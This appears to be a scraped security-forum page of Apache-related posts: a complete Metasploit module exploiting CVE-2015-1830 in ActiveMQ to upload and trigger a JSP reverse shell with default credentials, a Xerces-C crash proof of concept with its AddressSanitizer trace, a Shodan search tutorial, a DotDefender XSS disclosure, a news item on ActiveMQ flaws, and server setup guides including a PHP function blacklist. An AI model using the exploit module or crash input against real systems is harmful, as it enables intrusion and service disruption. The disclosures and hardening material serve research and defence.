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  1. This Metasploit module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ versions 5.x before 5.11.2 for Windows. The module tries to upload a JSP payload to the /admin directory via the traversal path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ credentials admin:admin (or other credentials provided by the user). It then issues an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the payload and obtain a shell. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload', 'Description' => %q{ This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. The module tries to upload a JSP payload to the /admin directory via the traversal path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ credentials admin:admin (or other credentials provided by the user). It then issues an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the payload and obtain a shell. }, 'Author' => [ 'David Jorm', # Discovery and exploit 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ [ 'CVE', '2015-1830' ], [ 'EDB', '40857'], [ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ] ], 'Privileged' => false, 'Platform' => %w{ win }, 'Targets' => [ [ 'Windows Java', { 'Arch' => ARCH_JAVA, 'Platform' => 'win' } ], ], 'DisclosureDate' => '2015-08-19', 'License' => MSF_LICENSE, 'DefaultOptions' => { 'RPORT' => 8161, 'PAYLOAD' => 'java/jsp_shell_reverse_tcp' }, 'DefaultTarget' => 0)) register_options([ OptString.new('TARGETURI', [true, 'The base path to the web application', '/']), OptString.new('PATH', [true, 'Traversal path', '/fileserver/..\\admin\\']), OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin']) ]) end def check print_status("Running check...") testfile = Rex::Text::rand_text_alpha(10) testcontent = Rex::Text::rand_text_alpha(10) send_request_cgi({ 'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"), 'headers' => { 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) }, 'method' => 'PUT', 'data' => "<% out.println(\"#{testcontent}\");%>" }) res1 = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"), 'headers' => { 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) }, 'method' => 'GET' }) if res1 && res1.body.include?(testcontent) send_request_cgi( opts = { 'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"), 'headers' => { 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) }, 'method' => 'DELETE' }, timeout = 1 ) return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def exploit print_status("Uploading payload...") testfile = Rex::Text::rand_text_alpha(10) vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails. send_request_cgi({ 'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"), 'headers' => { 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) }, 'method' => 'PUT', 'data' => payload.encoded }) print_status("Payload sent. Attempting to execute the payload.") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"), 'headers' => { 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) }, 'method' => 'GET' }) if res && res.code == 200 print_good("Payload executed!") else fail_with(Failure::PayloadFailed, "Failed to execute the payload") end end end Download Source
  2. Postasem asta si facusem si un tutorial/review mai explicit al acestui site pe blogul meu dar nu mai ma ocup de el asa ca postez tutorialul si aici. [+]Ce este shodan? -Shodan.io este un motor de c?utare dezvoltat de c?tre John Matherly, acest motor de c?utare are con?inut diferit fa?? de celelalte motoare de c?utare gen Google, Yahoo, Bing, ?i a?a mai departe. [+]Despre inregistrarea pe acest site. -Pentru a folosi shodan nu v? trebuie neap?rat un cont dar pentru a utiliza func?iile country ?i multe altele o s? v? trebuiasc? s? crea?i un cont, crearea contului se face în mod gratuit dar contul poate fi upgradat pl?tind suma de 49$ ca s? ave?i acces la mai multe facilit??i. V? pute?i înregistra accesând acest link: www.shodanhq.com/account/register [+]Filtre after/before: limiteaz? rezultatele dup? dat? (zi/lun?/an). country: limiteaz? rezultatele dup? ?ara, trebuie scris doar ini?ialele ??rii gen country:"RO" hostname: filtreaz? rezultatele dup? un anumit hostname sau domeniu. net: filtreaz? ip-urile dup? un anumit range . os: caut? dup? un anumit sistem de operare. port: caut? dup? anumite servicii. SSL: verific? dac? addonul SSL este activat La fiecare c?utare în stânga ne va arat? prima dat? "Top Countries" primele 4 ??ri care au cele mai multe rezultate dup? queryul c?utat de noi, "Top Services" topul servicilor care se încadreaz? în c?utarea noastr?, "Top Organizations" topul organizatilor care au serverele ce sunt afi?ate pentru c?utarea executat?, "Top OS(operating systems)" topul sistemelor de operare ce sunt afi?ate pt c?utarea executat?, ?i Top Products. [+]Informa?ii despre c?utarea de servere La fiecare c?utare de servere o s? verifice dac? are port-ul 80(HTTP) deschis ?i ne va afi?a ?i un HTTP Status de exemplu: 200 - OK 301 - Moved permanently 302 - Found 401 - Unauthorizated 403 - Forbidden pentru scoaterea rezultatelor "proaste" scriem dup? fiecare c?utare -301 -302 -401 -403 ?i a?a va afi?a doar rezultatele cu r?spunsul 200! exemplu: apache -301 -302 -401 -403 Exemple: Intra?i pe shodan.io ?i scrie?i în câmpul de c?utare apache country:"CH" ?i da?i c?utare o s? va afi?eze serverele apache din Switzerland, s? încercam s? g?sim serverele apache cu hostname-ul .edu pentru asta o s? folosim comand? apache hostname:.edu , pentru c?utarea servicilor o s? folosim filtrul port apache port:21 o s? caute serverele apache care ruleaz? serviciul 21(FTP). [+]Alte informa?ii Putem seta ca ce c?ut?m s? fie salvat(în istoricul siteului) pentru viitoarele utiliz?ri dar acestea sunt indexate, func?ia este recomandat s? fie dezactivat? deoarece c?ut?rile numai sunt indexate. Cu shodan putem c?uta dup? semafoare, sisteme de curent, sisteme de vânt, camere de supraveghere ?i multe alte sisteme pe viitor o s? fac un tutorial despre accesarea unui website prin contul administratorului, accesarea sistemelor, etc. În acest tutorial vreau s? fac doar un scurt review al acestui website. Accesarea acelor sisteme se datoreaz? neglijen?ei adminului fa?? de configurarea serverului de exemplu las? serverul cu datele de logare prestabilite sau sunt scoase definitiv. [+]Referin?e List? cu servici web ?i portul pe care ruleaz? ele: http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers Mai multe informatii despre shodan: https://www.youtube.com/watch?v=Pas_EB3bhEc
  3. # Exploit Title: Apache Xerces-C XML Parser (< 3.1.2) DoS POC # Date: 2015-05-03 # Exploit Author: beford # Vendor Homepage: http://xerces.apache.org/#xerces-c # Version: Versions prior to 3.1.2 # Tested on: Ubuntu 15.04 # CVE : CVE-2015-0252 Apache Xerces-C XML Parser Crashes on Malformed Input I believe this to be the same issue that was reported on CVE-2015-0252, posting this in case anyone is interested in reproducing it. Original advisory: https://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt $ printf "\xff\xfe\x00\x00\x3c" > file.xml $ DOMPrint ./file.xml # Ubuntu 15.04 libxerces-c3.1 package Segmentation fault $ ./DOMPrint ./file.xml # ASAN Enabled build ================================================================= ==6831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c at pc 0x836a721 bp 0xbf8127a8 sp 0xbf812798 READ of size 1 at 0xb5d9d87c thread T0 #0 0x836a720 in xercesc_3_1::XMLReader::refreshRawBuffer() xercesc/internal/XMLReader.cpp:1719 #1 0x836a720 in xercesc_3_1::XMLReader::xcodeMoreChars(unsigned short*, unsigned char*, unsigned int) xercesc/internal/XMLReader.cpp:1761 #2 0x837183f in xercesc_3_1::XMLReader::refreshCharBuffer() xercesc/internal/XMLReader.cpp:576 #3 0x837183f in xercesc_3_1::XMLReader::peekString(unsigned short const*) xercesc/internal/XMLReader.cpp:1223 #4 0x83ad0ae in xercesc_3_1::ReaderMgr::peekString(unsigned short const*) xercesc/internal/ReaderMgr.hpp:385 #5 0x83ad0ae in xercesc_3_1::XMLScanner::checkXMLDecl(bool) xercesc/internal/XMLScanner.cpp:1608 #6 0x83b6469 in xercesc_3_1::XMLScanner::scanProlog() xercesc/internal/XMLScanner.cpp:1244 #7 0x8d69220 in xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner.cpp:206 #8 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short const*) xercesc/internal/XMLScanner.cpp:400 #9 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) xercesc/internal/XMLScanner.cpp:408 #10 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) xercesc/parsers/AbstractDOMParser.cpp:601 #11 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398 #12 0xb6f5272d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d) #13 0x805d3b5 (/ramdisk/DOMPrint+0x805d3b5) 0xb5d9d87c is located 0 bytes to the right of 163964-byte region [0xb5d75800,0xb5d9d87c) allocated by thread T0 here: #0 0xb72c3ae4 in operator new(unsigned int) (/usr/lib/i386-linux-gnu/libasan.so.1+0x51ae4) #1 0x8340cce in xercesc_3_1::MemoryManagerImpl::allocate(unsigned int) xercesc/internal/MemoryManagerImpl.cpp:40 #2 0x8094cb2 in xercesc_3_1::XMemory::operator new(unsigned int, xercesc_3_1::MemoryManager*) xercesc/util/XMemory.cpp:68 #3 0x8daaaa7 in xercesc_3_1::IGXMLScanner::scanReset(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner2.cpp:1284 #4 0x8d6912a in xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner.cpp:198 #5 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short const*) xercesc/internal/XMLScanner.cpp:400 #6 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) xercesc/internal/XMLScanner.cpp:408 #7 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) xercesc/parsers/AbstractDOMParser.cpp:601 #8 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398 #9 0xb6f5272d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d) SUMMARY: AddressSanitizer: heap-buffer-overflow xercesc/internal/XMLReader.cpp:1719 xercesc_3_1::XMLReader::refreshRawBuffer() Source
  4. Vulnerable soft: Applicure DotDefender (all versions) Vendor's site: Download dotDefender 5.00 & 5.13 Vulnerabilities: Persistent XSS,Log forging,Potential DoS When Discovered: 15 March 2015 Discovered by: AkaStep Under some circumstances this is possible attack DotDefender's admin interface and as result conduct PHISHING/Log forging/Potential Denial Of service against "Log Viewer" functionality. The main reason of vulnerability: DotDefenders Developers trusts to X-Forwarded-for HTTP Header and to it's variable (that is client side controllable) and sadly there is no any validation/sanitization of that variable and it's val. This vulnerability was successfully tested against for the following configurations:(in Lab/ Production environment) 1) Apache Traffic Server ===> Apache 2.4 2) Apache 2.4 with mod_proxy. Tested versions:(But other versions may also be affected) • dotDefender Version: 5.12-13217 • Web Server Type: Apache • Server Operating System: Linux • Web Server Version: Unknown • dotDefender Version: 5.13-13282 • Web Server Type: Apache • Server Operating System: Linux • Web Server Version: Unknown Read more: http://packetstorm.wowhacker.com/1503-exploits/DotDefender-XSS.pdf
  5. Two critical bugs in the commonly used Apache ActiveMQ open source messaging and Integration Patterns server are leaving businesses open to denial-of-service (DoS) and brute force cyber attacks. Researchers at MWR InfoSecurity Labs reported identifying the bugs, warning they affect Apache ActiveMQ versions 5.0.0 to 5.10.0 and Apache ActiveMQ Apollo versions 1.0 to 1.7. The flaws reportedly stem from the way Apache ActiveMQ performs Lightweight Directory Access Protocol (LDAP) authentication. "A vulnerability was identified in ActiveMQ in the way it handles content-based subscriptions, which allows an adversary to trigger processing of XML external entities (XXE)," read the advisory. "Apache ActiveMQ Apollo, which is another MQ implementation built for reliability and performance and originally based on ActiveMQ, was also found to be affected by this vulnerability." The researchers added the flaws are dangerous as they could be exploited for a variety of purposes. "In order to successfully exploit this vulnerability, an attacker has to act on behalf of both a publisher and a consumer," read the advisory. "An attacker who is able to push and pull from a message queue can use this flaw to perform DTD-based DoS attacks, server-side request forgery or read local files, accessible to the user running the MQ broker, from the server." It is currently unclear whether hackers are actively exploiting the flaw. MWE InfoSecurity had not responded to V3's request for comment at the time of publishing. The flaw is dangerous as Apache ActiveMQ is a commonly used open source message broker service. Written in Java, Apache ActiveMQ is designed to facilitate communications between multiple clients or servers. The news follows the discovery of several critical flaws affecting other commonly used open source tools and services. Researchers reported uncovering the notorious Heartbleed flaw in April 2014. Heartbleed is a flaw in the OpenSSL implementation of the Transport Layer Security protocol used by open source web servers such as Apache and Nginx, which host around 66 percent of all sites. In a recent interview with V3, Maarten Ectors, Canonical's vice president of next-generation networks and proximity cloud, argued the nature of open source software development means further Heartbleed-level flaws will be discovered in the very near future. Source
  6. Daca aveti un domeniu pe care faceti multe subdomenii pentru development sau mai multe domenii pe doriti sa le mapati ca hosturi virtuale fara sa fie necesar sa dati reload la apache sau sa fiti nevoiti sa adaugati vhost-ul in fisierul de configurare, atunci tutorialul acesta va este de folos. Sa prespupunem ca aveti un domeniu, de exemplu, "rstcenter.com" iar in home user aveti un director www. Structura directoare: /home /home/tex /home/tex/www /home/tex/www/devel1.rstcenter.com /home/tex/www/devel2.rstcenter.com /home/tex/www/devel3.rstcenter.com /home/tex/www/books.rstcenter.com /home/tex/www/tools.rstcenter.com ............. Aveti de facut un singur virtual host in apache, apoi orice director creat dupa structura de mai sus, va putea fi utilizat ca virtual host, fara sa fiti nevoiti sa dati restart/reload sau sa adaugati ceva in apache. Virtual host: <VirtualHost> DocumentRoot /home/tex/www ServerAdmin webmaster@stfu.ro ServerName rstcenter.com ServerAlias *.rstcenter.com CustomLog logs/access_log combined ErrorLog logs/error_log RewriteEngine On RewriteMap lowercase int:tolower RewriteRule ^/(.*)$ /home/tex/www/${lowercase:%{SERVER_NAME}}/$1 </VirtualHost> Imi era lene sa tot adaug vhost-uri si sa dau reload pentru un amic cu un buncar de subdomenii utilizate la development. Cu asta, imi pot bea linistit cafelele
  7. Acest tutorial este adresat celor care doresc sa isi configureze un server cu Debian. O sa acopar in in el urmatoarele aspecte: 1. Instalare kernel cu grsec. 2. Instalare si configurare apache. 3. Instalare si configurare php. 4. Instalare si module php (extensii). 5. Configurare suhosin. 6. Instalare MySQL Server. 7. Modificari diverse permisiuni pentru un nivel mai bun de securitate 8. Instalare nginx si folosirea lui ca frontend pentru apache (dual strat web server) ---------------- 1. Instalare kernel cu grsec. Daca nu stiti inca ce este grsec/grsecurity, un bun punct de plecare este Grsecurity. Pentru linux, grsecurity este un fel de "sfantul graal" in materie de securitate. In plus, va scapa de o problema ce o are linux si care pe mine ma irita: ps aux dupa user, arata toate procesele. root@tex:~# echo "deb http://debian.cr0.org/repo/ kernel-security/" >> /etc/apt/sources.list root@tex:~# wget http://kernelsec.cr0.org/kernel-security.asc root@tex:~# apt-key add kernel-security.asc OK root@tex:~# apt-get update root@tex:~# apt-cache search grsec linux-source- - Linux kernel source for version linux-source- - Linux kernel source for version linux-image- - Linux kernel binary image for version linux-headers- - Header files related to Linux kernel, specifically, linux-source- - Linux kernel source for version root@tex:~# apt-get install linux-image- linux-headers- root@tex:~# init 6 # aici dam reboot pentru a boota noul kernel. // Dupa reboot root@tex:~# uname -a Linux tex #2 SMP Mon Jun 28 09:05:30 CEST 2010 x86_64 GNU/Linux root@tex:~# su - tex tex@tex:~$ ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND tex 2103 0.6 0.1 36908 1276 pts/0 S 00:58 0:00 su - tex tex 2104 13.0 0.6 23380 6200 pts/0 S 00:58 0:00 -su tex 2129 0.0 0.1 16332 1176 pts/0 R+ 00:58 0:00 ps aux Din cate observati, vad doar procesele mele dupa user. 2. Instalare si configurare apache. root@tex:~# apt-get install apache2-mpm-prefork apache2.2-common apache2.2-bin root@tex:~# rm /etc/apache2/sites-available/default root@tex:~# cat >> /etc/apache2/sites-available/default << EOF > NameVirtualHost * > > <Directory "/var/www"> > AllowOverride AuthConfig FileInfo Options Indexes Limit > Options FollowSymLinks > Options -Indexes > </Directory> > > <VirtualHost *> > DocumentRoot /var/www > ServerName > CustomLog /var/log/apache2/access_log combined > ErrorLog /var/log/apache2/error_log > </VirtualHost> > EOF root@tex:~# Apache o sa-l listam pe port 81 si o sa fie backend. root@tex:~# echo "Listen" > /etc/apache2/ports.conf root@tex:~# /etc/init.d/apache2 start 3. Instalare si configurare php (plus libapache2-mod-php5, necesar la apache (mod php)) PHP-ul o sa-l instalez de la dotdeb. root@tex:~# echo "deb http://packages.dotdeb.org stable all" >> /etc/apt/sources.list root@tex:~# echo "deb-src http://packages.dotdeb.org stable all" >> /etc/apt/sources.list root@tex:~# wget http://www.dotdeb.org/dotdeb.gpg root@tex:~# cat dotdeb.gpg |apt-key add - && rm dotdeb.gpg OK root@tex:~# apt-get update root@tex:~# apt-get install php5 php5-cli libapache2-mod-php5 php5-common php5-suhosin Inlocuiesc "expose_php = On" cu "expose_php = Off" / "short_open_tag = Off" cu "short_open_tag = On" si "session.name = PHPSESSID" cu "session.name = SERVLET" in php.ini pentru apache2. root@tex:~# perl -pi -e 's/expose_php = On/expose_php = Off/' /etc/php5/apache2/php.ini root@tex:~# perl -pi -e 's/short_open_tag = Off/short_open_tag = On/' /etc/php5/apache2/php.ini root@tex:~# perl -pi -e 's/PHPSESSID/SERVLET/' /etc/php5/apache2/php.ini 4. Instalare si configurare module php (extensii). O sa instalez urmatoarele extensii php: curl, gd, mcrypt, mysql. root@tex:~# apt-get install php5-curl php5-gd php5-mcrypt php5-mysql 5. Configurare suhosin. Din motive de securitate, o sa adaug in blacklisted utilizand suhosin urmatoarele functii: exec,shell_exec,passthru,show_source,dl,leak,ini_alter,ini_restore,proc_open,proc_nice,proc_terminate,proc_close,proc_get_status,symlink,system,popen,pcntl_getpriority,pcntl_wait,diskfreespace,disk_free_space,disk_total_space,get_current_user,stream_socket_accept,stream_socket_client,stream_socket_get_name,stream_socket_recvfrom,stream_socket_sendto,stream_socket_server,stream_socket_shutdown root@tex:~# cat >> /etc/php5/conf.d/suhosin.ini << EOF > > suhosin.executor.func.blacklist = "exec,shell_exec,passthru,show_source,dl,leak,ini_alter,ini_restore,proc_open,proc_nice,proc_terminate,proc_close,proc_get_status,symlink,system,popen,pcntl_getpriority,pcntl_wait,diskfreespace,disk_free_space,disk_total_space,get_current_user,stream_socket_accept,stream_socket_client,stream_socket_get_name,stream_socket_recvfrom,stream_socket_sendto,stream_socket_server,stream_socket_shutdown" > suhosin.cookie.max_array_depth = 256 > suhosin.cookie.max_array_index_length = 256 > suhosin.cookie.max_name_length = 256 > suhosin.cookie.max_totalname_length = 512 > suhosin.cookie.max_value_length = 20000 > suhosin.cookie.max_vars = 200 > suhosin.get.max_array_depth = 200 > suhosin.get.max_totalname_length = 1024 > suhosin.get.max_value_length = 1024 > suhosin.get.max_vars = 1024 > > > suhosin.post.max_array_depth = 1024 > suhosin.post.max_array_index_length = 1024 > suhosin.post.max_name_length = 1024 > suhosin.post.max_totalname_length = 1024 > suhosin.post.max_value_length = 95000 > suhosin.post.max_vars = 1024 > > suhosin.request.max_vars = 512 > suhosin.request.max_value_length = 90000 > suhosin.request.max_totalname_length = 1024 > suhosin.upload.max_uploads = 400 > > suhosin.executor.include.max_traversal = 2 > > EOF root@tex:~# Cam asa arata php in cli: root@tex:~# php -v PHP 5.3.8-1~dotdeb.2 with Suhosin-Patch (cli) (built: Aug 25 2011 13:30:46) Copyright (c) 1997-2011 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2011 Zend Technologies with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH root@tex:~# 6. Instalare MySQL Server si MySQL Client root@tex:~# apt-get install mysql-client-5.5 mysql-server-5.5 7. Modificari diverse permisiuni pentru un nivel mai bun de securitate Mountam tmpfs in /tmp cu flag-urile "noexec,nosuid,nodev" din motive de securitate. root@tex:~# echo "tmpfs /tmp tmpfs noexec,nosuid,nodev 2 2" >> /etc/fstab root@tex:~# mount /tmp root@tex:~# mount |grep "/tmp" tmpfs on /tmp type tmpfs (rw,noexec,nosuid,nodev) Stergem "/var/tmp" si il facem simlink catre tmp. root@tex:~# rm -rf /var/tmp/ && ln -s /tmp /var/tmp Dam chmod 640 la "/dev/shm" din motive de securitate. root@tex:~# chmod 640 /dev/shm 8. Instalare nginx si folosirea lui ca frontend pentru apache (dual strat web server) O sa listam port 80 cu nginx si o sa-l folosim ca frontend pentru apache, care se listeaza pe port 81. (reverse proxy) root@tex:~# apt-get install nginx root@tex:~# rm /etc/nginx/sites-enabled/default root@tex:~# pico /etc/nginx/sites-enabled/default # fisier configuratie server { listen default; server_name _; access_log off; error_log /dev/null; location / { proxy_pass; proxy_redirect off; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } } Pornim nginx-ul. root@tex:~# /etc/init.d/nginx start Starting nginx: nginx. root@tex:~# [URL="http://i42.tinypic.com/121zmtx.png"]O sa pun un phpinfo in "/var/www/"[/URL] pentru a vedea daca este totul in ordine si o sa sterg index.html (default) root@tex:~# echo "<?php phpinfo(); ?>" >> /var/www/index.php root@tex:~# rm /var/www/index.html // restart la apache. root@tex:~# /etc/init.d/apache2 restart --------- Note: - Daca aveti intrebari legate de acest tutorial, va raspund cu cea mai mare placere. - Imi cer scuze pentru eventualele greseli legate de exprimare (am cam tras chiulul de la somn) - Nu am specificat sursa acestui tutorial pentru ca este facut de mine.
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